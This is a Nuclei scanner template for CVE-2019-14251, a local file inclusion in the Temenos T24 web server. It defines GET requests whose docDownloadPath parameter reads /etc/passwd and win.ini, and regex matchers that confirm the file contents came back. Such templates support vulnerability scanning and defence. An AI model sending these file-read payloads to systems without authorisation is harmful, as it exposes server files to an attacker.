nuclei-templates/cves/2019/CVE-2019-14251.yaml

39 lines
1.0 KiB
YAML

id: CVE-2019-14251
info:
name: T24 Web Server - Local File Inclusion
author: 0x_Akoko
severity: high
description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server.
reference:
- https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt
- https://vuldb.com/?id.146815
- https://nvd.nist.gov/vuln/detail/CVE-2019-14251
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-14251
cwe-id: CWE-22
tags: cve,cve2019,temenos,lfi,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd"
- "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "for 16-bit app support"
condition: or
- type: status
status:
- 200
# Enhanced by mp on 2022/07/13